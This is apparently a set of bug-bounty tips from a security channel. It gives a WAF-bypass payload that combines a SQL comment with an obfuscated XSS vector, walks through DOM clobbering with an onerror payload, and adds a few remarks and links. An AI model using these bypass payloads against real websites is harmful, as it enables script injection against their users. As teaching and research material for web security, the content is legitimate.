Interesting way to bypass WAF when you need to use the </noscript> tag:
Inspired by: https://x.com/_0x999?s=21

meydi" or 1=/*</noscript>*/ -- - <XSS>

The WAF first checks for SQLi, so ignore the comment section.

e.g:

meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>

https://x.com/neotrony/status/1931790830336884973?s=2

“bug bounty as we know it probably dies.”

Couldn’t of said it better myself tbh. Although I think we are 3-5years away from this. People doing bug bounties full time should be planning for the future (I know I am)

https://x.com/zseano/status/1932719746538996157?s=61

This is how DOM clobbering works.

When you create an element with an id, the browser automatically creates a global variable for that ID:

<a id="foo"></a>

Now

window.foo

points to that single element.

But when you create multiple elements with the same id:

<a id="foo"></a>
<a id="foo"></a>

Now

window.foo

becomes an HTMLCollection, not a single element.

Add a name attribute:

<a id="foo" name="bar" href="..."></a>

And

window.foo.bar

now points to that element (works in Chromium/WebKit browsers, but not Firefox).

Now combine that with a common JS pattern like:

var someObject = window.someObject || {};

This is meant to provide a fallback if the global doesn't exist. However, if

window.someObject

has been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.

Now imagine this JS logic:

let imgSrc = someObject.avatar;

If an attacker clobbered

someObject.avatar

with:

<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>

If HTML is set via innerHTML or similar, then this could render as:

<img src="cid:" onerror="alert(1)//"">

let's do some mass hunt

C2H5OH + hunt = success

https://nostarch.com/zero-day
این کتابو هرجور نشده تهیه کنید و بخونید
من نمیتونم اینجا چیزی بذارم یا بگم.
ولی دنبالش باشید

https://capturetheflag.withgoogle.com

ctf google